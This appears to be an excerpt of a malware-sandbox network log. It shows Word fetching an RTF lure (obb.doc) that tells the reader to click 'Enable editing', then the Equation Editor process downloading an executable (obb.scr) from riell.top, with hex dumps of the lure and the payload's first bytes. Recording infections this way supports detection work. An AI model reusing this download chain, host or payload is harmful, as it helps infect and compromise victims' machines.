                    2024-07-04 19:38:31 UTC156OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 72 69 65 6c 6c 2e 74 6f 70 0d 0a 0d 0a
                    Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: riell.top
                    2024-07-04 19:38:32 UTC724INHTTP/1.1 405 Method Not Allowed
                    Date: Thu, 04 Jul 2024 19:38:32 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Transfer-Encoding: chunked
                    Connection: close
                    Allow: POST,OPTIONS,HEAD,GET,TRACE
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r8YBvLn3D7b6AZVQdAZlsNYUz8c5FRs0%2F%2FX62k660kB6XmLM13yKPfU52uRGc8EeProliLqwvl5nXj1AsWCu46VMBfKFHhNnSyl4O34ltuMG1JwhHK%2FPB%2BtYrj0%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Strict-Transport-Security: max-age=0; includeSubDomains; preload
                    X-Content-Type-Options: nosniff
                    Server: cloudflare
                    CF-RAY: 89e1937e4f3117a5-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:32 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                    Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                    2024-07-04 19:38:32 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination Port
                    4192.168.2.2249165188.114.97.3443
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:33 UTC156OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 72 69 65 6c 6c 2e 74 6f 70 0d 0a 0d 0a
                    Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: riell.top
                    2024-07-04 19:38:33 UTC732INHTTP/1.1 405 Method Not Allowed
                    Date: Thu, 04 Jul 2024 19:38:33 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Transfer-Encoding: chunked
                    Connection: close
                    Allow: POST,OPTIONS,HEAD,GET,TRACE
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oHST832WpxYqynuHj3NAHNtEGDyDEadVV0E5%2Fte%2BTOmh%2BRJ0e2%2BAX9jgZupVqAK%2BFupTidivNOFgrEAqkvo%2BVrDqPmJ%2FIyOtlh2nZJs%2BjzlLXJx5zqWCkGugNu4%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Strict-Transport-Security: max-age=0; includeSubDomains; preload
                    X-Content-Type-Options: nosniff
                    Server: cloudflare
                    CF-RAY: 89e1938879104222-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:33 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                    Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                    2024-07-04 19:38:33 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.2249166188.114.97.34432544C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:34 UTC347OUTGET /obb.doc HTTP/1.1
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    Host: riell.top
                    Connection: Keep-Alive
                    2024-07-04 19:38:34 UTC835INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:34 GMT
                    Content-Type: application/msword
                    Content-Length: 549151
                    Connection: close
                    Last-Modified: Thu, 04 Jul 2024 01:08:06 GMT
                    ETag: "6685f5f6-8611f"
                    Expires: Thu, 31 Dec 2037 23:55:55 GMT
                    Cache-Control: max-age=315360000
                    CF-Cache-Status: HIT
                    Age: 63617
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ktTE%2BO8%2BIjGrJfXTO8z%2FXjwAIsufklZuOlhlimajm7mz%2Fbs3liGvSynO9qZ8gg%2B7diRvIVBBYGcn3VTRbXzgE2xIgaItEiXEadBk8yjLCEepVS6D30KoJLB4p%2Fc%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Strict-Transport-Security: max-age=0; includeSubDomains; preload
                    X-Content-Type-Options: nosniff
                    Server: cloudflare
                    CF-RAY: 89e1938deeb5438e-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:34 UTC534INData Raw: 7b 5c 72 74 66 31 0d 0d 7b 5c 2a 5c 71 47 64 4a 6f 79 7a 35 48 58 67 37 36 51 38 69 6e 43 52 37 73 4e 74 32 57 55 69 4b 53 4f 38 7a 36 74 59 46 7a 57 41 39 4a 66 65 43 76 71 45 48 52 4b 77 75 61 78 34 68 74 43 32 30 61 55 4b 77 67 70 6d 57 50 59 37 39 71 56 67 4b 6f 49 56 62 31 72 56 6b 51 4d 32 45 76 45 67 78 42 53 42 37 71 45 70 57 73 6a 72 78 7d 0d 0d 7b 5c 36 31 39 36 33 37 39 36 31 70 6c 65 61 73 65 20 63 6c 69 63 6b 20 45 6e 61 62 6c 65 20 65 64 69 74 69 6e 67 20 66 72 6f 6d 20 74 68 65 20 79 65 6c 6c 6f 77 20 62 61 72 20 61 62 6f 76 65 2e 54 68 65 20 69 6e 64 65 70 65 6e 64 65 6e 74 20 61 75 64 69 74 6f 72 73 92 20 6f 70 69 6e 69 6f 6e 20 73 61 79 73 20 74 68 65 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 20 61 72 65 20 66 61 69
                    Data Ascii: {\rtf1{\*\qGdJoyz5HXg76Q8inCR7sNt2WUiKSO8z6tYFzWA9JfeCvqEHRKwuax4htC20aUKwgpmWPY79qVgKoIVb1rVkQM2EvEgxBSB7qEpWsjrx}{\619637961please click Enable editing from the yellow bar above.The independent auditors opinion says the financial statements are fai
                    2024-07-04 19:38:34 UTC1369INData Raw: 74 20 6e 65 63 65 73 73 61 72 79 20 74 6f 20 0d 0d 0a 70 6c 61 6e 20 74 68 65 20 61 75 64 69 74 2e 20 41 75 64 69 74 6f 72 73 20 75 73 65 20 74 68 69 73 20 75 6e 64 65 72 73 74 61 6e 64 69 6e 67 20 6f 66 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 73 20 74 6f 20 61 73 73 65 73 73 20 74 68 65 20 72 69 73 6b 20 6f 66 20 6d 61 74 65 72 69 61 6c 20 6d 69 73 73 74 61 74 65 6d 65 6e 74 20 6f 66 20 74 68 65 20 66 69 6e 61 6e 63 69 61 6c 20 0d 0d 0a 73 74 61 74 65 6d 65 6e 74 73 20 61 6e 64 20 74 6f 20 64 65 73 69 67 6e 20 61 70 70 72 6f 70 72 69 61 74 65 20 61 75 64 69 74 20 70 72 6f 63 65 64 75 72 65 73 20 74 6f 20 6d 69 6e 69 6d 69 7a 65 20 74 68 61 74 20 72 69 73 6b 2e 54 68 65 20 64 65 66 69 6e 69 74 69 6f 6e 20 6f 66 20 67 6f 6f 64 20 69 6e 74 65 72
                    Data Ascii: t necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good inter
                    2024-07-04 19:38:34 UTC1369INData Raw: 65 78 61 6d 70 6c 65 20 6f 66 20 61 20 64 65 66 69 63 69 65 6e 63 79 20 69 6e 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 20 74 68 61 74 92 73 20 0d 0d 0a 73 65 76 65 72 65 20 65 6e 6f 75 67 68 20 74 6f 20 62 65 20 63 6f 6e 73 69 64 65 72 65 64 20 61 20 6d 61 74 65 72 69 61 6c 20 77 65 61 6b 6e 65 73 73 20 6f 72 20 73 69 67 6e 69 66 69 63 61 6e 74 20 64 65 66 69 63 69 65 6e 63 79 20 69 73 20 77 68 65 6e 20 61 6e 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 20 6c 61 63 6b 73 20 74 68 65 20 6b 6e 6f 77 6c 65 64 67 65 20 61 6e 64 20 74 72 61 69 6e 69 6e 67 20 74 6f 20 0d 0d 0a 70 72 65 70 61 72 65 20 69 74 73 20 6f 77 6e 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 2c 20 69 6e 63 6c 75 64 69 6e 67 20 66 6f 6f 74 6e 6f 74 65 20 64 69 73 63
                    Data Ascii: example of a deficiency in internal control thats severe enough to be considered a material weakness or significant deficiency is when an organization lacks the knowledge and training to prepare its own financial statements, including footnote disc
                    2024-07-04 19:38:34 UTC1369INData Raw: 63 79 20 69 73 20 63 6f 72 72 65 63 74 65 64 2e 4f 74 68 65 72 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 69 64 65 6e 74 69 66 69 65 64 20 0d 0d 0a 64 75 72 69 6e 67 20 74 68 65 20 61 75 64 69 74 20 74 68 61 74 20 61 72 65 20 6e 6f 74 20 63 6f 6e 73 69 64 65 72 65 64 20 73 65 76 65 72 65 20 65 6e 6f 75 67 68 20 74 6f 20 62 65 20 73 69 67 6e 69 66 69 63 61 6e 74 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 6f 72 20 6d 61 74 65 72 69 61 6c 20 77 65 61 6b 6e 65 73 73 65 73 20 6e 65 65 64 20 6e 6f 74 20 62 65 20 63 6f 6d 6d 75 6e 69 63 61 74 65 64 20 69 6e 20 0d 0d 0a 77 72 69 74 69 6e 67 2e 20 49 66 20 61 75 64 69 74 6f 72 73 20 64 65 74 65 72 6d 69 6e 65 20 74 68 65 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 61
                    Data Ascii: cy is corrected.Other internal control deficiencies identified during the audit that are not considered severe enough to be significant deficiencies or material weaknesses need not be communicated in writing. If auditors determine the deficiencies a
                    2024-07-04 19:38:34 UTC1369INData Raw: 61 67 65 6d 65 6e 74 20 6f 72 20 74 68 6f 73 65 20 63 68 61 72 67 65 64 20 77 69 74 68 20 67 6f 76 65 72 6e 61 6e 63 65 2e 44 75 72 69 6e 67 20 74 68 65 20 63 6f 75 72 73 65 20 6f 66 20 61 6e 20 61 75 64 69 74 2c 20 74 68 65 20 61 75 64 69 74 6f 72 73 20 6d 69 67 68 74 20 61 6c 73 6f 20 0d 0d 0a 69 64 65 6e 74 69 66 79 20 6f 74 68 65 72 20 6d 61 74 74 65 72 73 20 74 68 61 74 20 61 72 65 6e 92 74 20 63 6f 6e 73 69 64 65 72 65 64 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 69 6e 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 2c 20 62 75 74 20 61 72 65 20 6f 70 70 6f 72 74 75 6e 69 74 69 65 73 20 66 6f 72 20 73 74 72 65 6e 67 74 68 65 6e 69 6e 67 20 70 72 6f 63 65 64 75 72 65 73 20 61 6e 64 2f 6f 72 20 0d 0d 0a 6f 70 65 72 61 74 69 6e 67 20 64 65 66 69 63
                    Data Ascii: agement or those charged with governance.During the course of an audit, the auditors might also identify other matters that arent considered deficiencies in internal control, but are opportunities for strengthening procedures and/or operating defic
                    2024-07-04 19:38:34 UTC1369INData Raw: 65 64 20 77 69 74 68 20 67 6f 76 65 72 6e 61 6e 63 65 20 77 69 74 68 20 76 61 6c 75 61 62 6c 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 72 65 67 61 72 64 69 6e 67 20 74 68 65 69 72 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 2e 20 55 73 65 64 20 70 72 6f 70 65 72 6c 79 2c 20 74 68 65 20 4d 61 6e 61 67 65 6d 65 6e 74 20 4c 65 74 74 65 72 20 63 61 6e 20 62 65 20 61 20 0d 0d 0a 62 65 6e 65 66 69 63 69 61 6c 20 74 6f 6f 6c 20 66 6f 72 20 61 73 73 69 73 74 69 6e 67 20 6d 61 6e 61 67 65 6d 65 6e 74 20 6f 72 20 74 68 6f 73 65 20 63 68 61 72 67 65 64 20 77 69 74 68 20 67 6f 76 65 72 6e 61 6e 63 65 20 69 6e 20 66 75 6c 66 69 6c 6c 69 6e 67 20 74 68 65 69 72 20 72 65 73 70 6f 6e 73 69 62 69 6c 69 74 69 65 73 25 34 34 25 36 46 25 36 33 25 37 35 25 36 44 25 36 35 25 36 45
                    Data Ascii: ed with governance with valuable information regarding their organization. Used properly, the Management Letter can be a beneficial tool for assisting management or those charged with governance in fulfilling their responsibilities%44%6F%63%75%6D%65%6E
                    2024-07-04 19:38:34 UTC1369INData Raw: 36 45 25 37 36 25 36 35 25 36 45 25 37 34 25 36 39 25 36 46 25 36 45 25 36 31 25 36 43 25 32 30 25 36 39 25 36 45 25 37 34 25 36 35 25 37 32 25 36 31 25 36 33 25 37 34 25 36 39 25 36 46 25 36 45 0d 0d 0a 25 37 33 25 32 30 25 37 34 25 36 46 25 32 30 25 37 30 25 37 32 25 36 46 25 36 44 25 36 46 25 37 34 25 36 35 25 32 30 25 37 34 25 36 38 25 36 35 25 32 30 25 37 30 25 37 32 25 36 46 25 36 34 25 37 35 25 36 33 25 37 34 25 37 33 25 32 30 25 36 31 25 36 45 25 36 34 25 32 30 25 37 33 25 36 35 25 37 32 25 37 36 25 36 39 25 36 33 25 36 35 25 37 33 25 32 45 25 32 30 25 34 37 25 37 35 25 36 35 25 37 32 25 36 39 25 36 43 0d 0d 0a 25 36 43 25 36 31 25 32 30 25 36 44 25 36 31 25 37 32 25 36 42 25 36 35 25 37 34 25 36 39 25 36 45 25 36 37 25 32 30 25 37 33 25 37 34 25
                    Data Ascii: 6E%76%65%6E%74%69%6F%6E%61%6C%20%69%6E%74%65%72%61%63%74%69%6F%6E%73%20%74%6F%20%70%72%6F%6D%6F%74%65%20%74%68%65%20%70%72%6F%64%75%63%74%73%20%61%6E%64%20%73%65%72%76%69%63%65%73%2E%20%47%75%65%72%69%6C%6C%61%20%6D%61%72%6B%65%74%69%6E%67%20%73%74%
                    2024-07-04 19:38:34 UTC1369INData Raw: 43 25 37 39 25 32 30 25 36 46 25 36 32 25 37 33 25 36 35 25 37 32 25 37 36 25 36 39 25 36 45 25 36 37 25 32 30 25 36 31 25 36 45 25 36 34 25 32 30 25 37 35 25 36 45 25 36 34 25 36 35 25 37 32 25 37 33 25 37 34 25 36 31 25 36 45 0d 0d 0a 25 36 34 25 36 39 25 36 45 25 36 37 25 32 30 25 37 34 25 36 38 25 36 35 25 32 30 25 36 33 25 37 35 25 37 33 25 37 34 25 36 46 25 36 44 25 36 35 25 37 32 25 32 37 25 37 33 25 32 30 25 37 30 25 37 32 25 36 39 25 36 33 25 36 35 25 32 30 25 36 31 25 36 45 25 36 34 25 32 30 25 36 32 25 36 43 25 36 43 25 32 30 70 6c 65 61 73 65 20 63 6c 69 63 6b 20 45 6e 61 62 6c 65 20 65 64 69 74 69 6e 67 20 66 72 6f 6d 20 74 68 65 20 79 65 6c 6c 6f 77 20 62 61 72 20 61 62 6f 76 65 2e 54 68 65 20 69 6e 64 65 70 65 6e 64 65 6e 74 20 61 75 64 69
                    Data Ascii: C%79%20%6F%62%73%65%72%76%69%6E%67%20%61%6E%64%20%75%6E%64%65%72%73%74%61%6E%64%69%6E%67%20%74%68%65%20%63%75%73%74%6F%6D%65%72%27%73%20%70%72%69%63%65%20%61%6E%64%20%62%6C%6C%20please click Enable editing from the yellow bar above.The independent audi
                    2024-07-04 19:38:34 UTC1369INData Raw: 20 6f 66 20 61 63 63 6f 75 6e 74 20 62 61 6c 61 6e 63 65 73 20 6f 72 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 20 64 69 73 63 6c 6f 73 75 72 65 73 2c 20 79 6f 75 72 20 69 6e 74 65 72 6e 61 6c 20 0d 0d 0a 63 6f 6e 74 72 6f 6c 73 20 61 72 65 20 63 6f 6e 73 69 64 65 72 65 64 20 74 6f 20 62 65 20 64 65 66 69 63 69 65 6e 74 2e 41 75 64 69 74 6f 72 73 20 65 76 61 6c 75 61 74 65 20 65 61 63 68 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 20 64 65 66 69 63 69 65 6e 63 79 20 6e 6f 74 65 64 20 64 75 72 69 6e 67 20 74 68 65 20 61 75 64 69 74 20 74 6f 20 64 65 74 65 72 6d 69 6e 65 20 77 68 65 74 68 65 72 20 74 68 65 20 0d 0d 0a 64 65 66 69 63 69 65 6e 63 79 2c 20 6f 72 20 61 20 63 6f 6d 62 69 6e 61 74 69 6f 6e 20 6f 66 20 64 65 66 69 63 69 65
                    Data Ascii: of account balances or financial statement disclosures, your internal controls are considered to be deficient.Auditors evaluate each internal control deficiency noted during the audit to determine whether the deficiency, or a combination of deficie
                    2024-07-04 19:38:34 UTC1369INData Raw: 6c 61 63 6b 73 20 61 20 72 65 61 73 6f 6e 61 62 6c 65 20 65 78 70 6c 61 6e 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 64 65 63 69 73 69 6f 6e 2e 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 6e 6f 6e 70 72 6f 66 69 74 73 20 74 68 61 74 20 6c 61 63 6b 20 74 68 65 20 61 62 69 6c 69 74 79 20 74 6f 20 0d 0d 0a 70 72 65 70 61 72 65 20 74 68 65 69 72 20 6f 77 6e 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 20 6f 66 74 65 6e 20 66 69 6e 64 20 69 74 20 63 6f 73 74 20 70 72 6f 68 69 62 69 74 69 76 65 20 74 6f 20 72 65 6d 65 64 79 20 74 68 65 20 64 65 66 69 63 69 65 6e 63 79 20 62 79 20 74 72 61 69 6e 69 6e 67 20 63 75 72 72 65 6e 74 20 65 6d 70 6c 6f 79 65 65 73 20 6f 72 20 62 79 20 68 69 72 69 6e 67 20 0d 0d 0a 61 64 64 69 74 69 6f 6e 61 6c 20 65 6d
                    Data Ascii: lacks a reasonable explanation for the decision. For example, nonprofits that lack the ability to prepare their own financial statements often find it cost prohibitive to remedy the deficiency by training current employees or by hiring additional em


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.2249167188.114.97.34432544C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:35 UTC136OUTHEAD /obb.doc HTTP/1.1
                    User-Agent: Microsoft Office Existence Discovery
                    Host: riell.top
                    Content-Length: 0
                    Connection: Keep-Alive
                    2024-07-04 19:38:35 UTC835INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:35 GMT
                    Content-Type: application/msword
                    Content-Length: 549151
                    Connection: close
                    Last-Modified: Thu, 04 Jul 2024 01:08:06 GMT
                    ETag: "6685f5f6-8611f"
                    Expires: Thu, 31 Dec 2037 23:55:55 GMT
                    Cache-Control: max-age=315360000
                    CF-Cache-Status: HIT
                    Age: 63618
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2BsNZz4Qjn1Gq9b2FeID5xVRlsUHwm3LGu2sThn%2F8uaVW1xmGZOuxGW8FB9NpbzzQnhUUJmgAWxHr88%2BWxuLa0giMf%2B2kkXa0OpKGV6o%2BEtU4ORwG2vOu%2FHd2jQ%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Strict-Transport-Security: max-age=0; includeSubDomains; preload
                    X-Content-Type-Options: nosniff
                    Server: cloudflare
                    CF-RAY: 89e193958b2e42b7-EWR
                    alt-svc: h3=":443"; ma=86400


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.2249168188.114.97.34433436C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:36 UTC303OUTGET /obb.scr HTTP/1.1
                    Accept: */*
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: riell.top
                    Connection: Keep-Alive
                    2024-07-04 19:38:37 UTC761INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:36 GMT
                    Content-Type: application/x-silverlight
                    Content-Length: 520704
                    Connection: close
                    Last-Modified: Thu, 04 Jul 2024 01:04:33 GMT
                    ETag: "7f200-61c6187abf972"
                    Accept-Ranges: bytes
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QL6Oh2jXWtEehAn%2FO4UldENIqRNqtGKokGJghPZD0iFQQtaom1RH9p6uZiv9S%2Bn%2Fv%2Fr8DcL5mgcC6ANkYuWjReIbbl96ofzNPn5KiIskZMjLDvxOQuLnaJSAdmg%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Strict-Transport-Security: max-age=0; includeSubDomains; preload
                    X-Content-Type-Options: nosniff
                    Server: cloudflare
                    CF-RAY: 89e1939b89657281-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:37 UTC1369INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b8 3a 2c 92 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e8 07 00 00 08 00 00 00 00 00 00 be 06 08 00 00 20 00 00 00 20 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL:,0 @ `@
                    2024-07-04 19:38:37 UTC1369INData Raw: 2a 2e 72 45 08 00 70 28 30 00 00 06 2a 2e 72 75 08 00 70 28 30 00 00 06 2a 2e 72 9d 08 00 70 28 30 00 00 06 2a 2e 72 c1 08 00 70 28 30 00 00 06 2a 2e 72 e7 08 00 70 28 30 00 00 06 2a 2e 72 11 09 00 70 28 30 00 00 06 2a 2e 72 3b 09 00 70 28 30 00 00 06 2a 2e 72 5f 09 00 70 28 30 00 00 06 2a 2e 72 81 09 00 70 28 30 00 00 06 2a 2e 72 b3 09 00 70 28 30 00 00 06 2a 2e 72 d7 09 00 70 28 30 00 00 06 2a 2e 72 f7 09 00 70 28 30 00 00 06 2a 2e 72 13 0a 00 70 28 30 00 00 06 2a 2e 72 49 0a 00 70 28 30 00 00 06 2a 2e 72 61 0a 00 70 28 30 00 00 06 2a 2e 72 a5 0a 00 70 28 30 00 00 06 2a 2e 72 d9 0a 00 70 28 30 00 00 06 2a 2e 72 f9 0a 00 70 28 30 00 00 06 2a 2e 72 25 0b 00 70 28 30 00 00 06 2a 2e 72 51 0b 00 70 28 30 00 00 06 2a 2e 72 7d 0b 00 70 28 30 00 00 06 2a 1e 02
                    Data Ascii: *.rEp(0*.rup(0*.rp(0*.rp(0*.rp(0*.rp(0*.r;p(0*.r_p(0*.rp(0*.rp(0*.rp(0*.rp(0*.rp(0*.rIp(0*.rap(0*.rp(0*.rp(0*.rp(0*.r%p(0*.rQp(0*.r}p(0*
                    2024-07-04 19:38:37 UTC1369INData Raw: 03 6f 03 00 00 0a 74 14 00 00 02 2a 72 02 28 2c 01 00 06 02 05 28 aa 00 00 06 02 04 28 ae 00 00 06 02 03 28 ac 00 00 06 2a 1e 02 7b 4c 00 00 04 2a 22 02 03 7d 4c 00 00 04 2a 1e 02 7b 4d 00 00 04 2a 22 02 03 7d 4d 00 00 04 2a 1e 02 7b 4e 00 00 04 2a 22 02 03 7d 4e 00 00 04 2a 56 02 28 2c 01 00 06 02 03 28 b4 00 00 06 02 04 28 b6 00 00 06 2a 6a 02 28 2c 01 00 06 02 03 73 a4 02 00 06 28 b4 00 00 06 02 04 28 b6 00 00 06 2a 6a 02 28 2c 01 00 06 02 03 73 a1 02 00 06 28 b4 00 00 06 02 04 28 b6 00 00 06 2a 22 02 03 7d 61 00 00 04 2a 1e 02 7b 62 00 00 04 2a 22 02 03 7d 62 00 00 04 2a 3a 02 28 69 00 00 0a 02 03 7d 65 00 00 04 2a 56 02 28 69 00 00 0a 02 03 7d 65 00 00 04 02 04 7d 64 00 00 04 2a 86 02 28 69 00 00 0a 02 03 7d 65 00 00 04 02 04 7d 64 00 00 04 02 28 bf
